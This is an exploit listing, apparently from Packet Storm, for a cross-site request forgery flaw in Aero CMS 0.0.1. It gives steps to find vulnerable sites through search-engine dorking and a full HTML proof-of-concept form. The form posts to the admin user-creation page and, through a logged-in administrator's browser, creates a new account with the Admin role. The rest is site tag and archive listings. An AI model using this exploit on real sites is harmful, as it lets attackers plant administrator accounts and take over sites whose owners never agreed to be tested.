2024-7-31 22:17:0 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏
- Aero CMS 0.0.1 Cross Site Request Forgery
- Posted Jul 31, 2024
- Authored by indoushka
Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.
- tags | exploit, csrf
- SHA-256 |
d177460484605e92448747eb5276d4dbc65842e8466efab16cfdeff8b9e1e531 - Download | Favorite | View
=============================================================================================================================================
| # Title : Aero CMS v0.0.1 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master |
=============================================================================================================================================poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 9.
[+] Set the target site link Save changes and apply .
[+] infected file : admin/users.php?source=add_user
[+] save code as poc.html .
<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST">
<div>
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
</div>
<div>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
</div>
<div>
<label for="user_email">Email:</label>
<input type="email" id="user_email" name="user_email" required>
</div>
<div>
<label for="user_first_name">First Name:</label>
<input type="text" id="user_first_name" name="user_first_name" required>
</div>
<div>
<label for="user_last_name">Last Name:</label>
<input type="text" id="user_last_name" name="user_last_name" required>
</div>
<div>
<label for="user_image">Profile Image:</label>
<input type="file" id="user_image" name="user_image">
</div>
<div>
<label for="user_role">User Role:</label>
<select id="user_role" name="user_role" required>
<option value="admin">Admin</option>
<option value="editor">Editor</option>
<option value="subscriber">Subscriber</option>
</select>
</div>
<div>
<button type="submit" name="create_user">Create User</button>
</div>
</form>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
File Tags
- ActiveX (933)
- Advisory (86,223)
- Arbitrary (16,842)
- BBS (2,859)
- Bypass (1,855)
- CGI (1,033)
- Code Execution (7,784)
- Conference (691)
- Cracker (844)
- CSRF (3,384)
- DoS (25,024)
- Encryption (2,389)
- Exploit (53,098)
- File Inclusion (4,257)
- File Upload (990)
- Firewall (822)
- Info Disclosure (2,885)
- Intrusion Detection (914)
- Java (3,141)
- JavaScript (896)
- Kernel (7,184)
- Local (14,788)
- Magazine (586)
- Overflow (13,165)
- Perl (1,435)
- PHP (5,221)
- Proof of Concept (2,381)
- Protocol (3,724)
- Python (1,631)
- Remote (31,625)
- Root (3,633)
- Rootkit (526)
- Ruby (631)
- Scanner (1,657)
- Security Tool (8,024)
- Shell (3,273)
- Shellcode (1,217)
- Sniffer (902)
- Spoof (2,275)
- SQL Injection (16,594)
- TCP (2,440)
- Trojan (690)
- UDP (904)
- Virus (669)
- Vulnerability (32,921)
- Web (9,953)
- Whitepaper (3,781)
- x86 (967)
- XSS (18,239)
- Other
File Archives
Systems
- AIX (429)
- Apple (2,099)
- BSD (377)
- CentOS (58)
- Cisco (1,927)
- Debian (7,084)
- Fedora (1,693)
- FreeBSD (1,246)
- Gentoo (4,534)
- HPUX (880)
- iOS (378)
- iPhone (108)
- IRIX (220)
- Juniper (69)
- Linux (50,580)
- Mac OS X (691)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (489)
- RedHat (16,432)
- Slackware (941)
- Solaris (1,611)
- SUSE (1,444)
- Ubuntu (9,710)
- UNIX (9,432)
- UnixWare (187)
- Windows (6,668)
- Other
如有侵权请联系:admin#unsafe.sh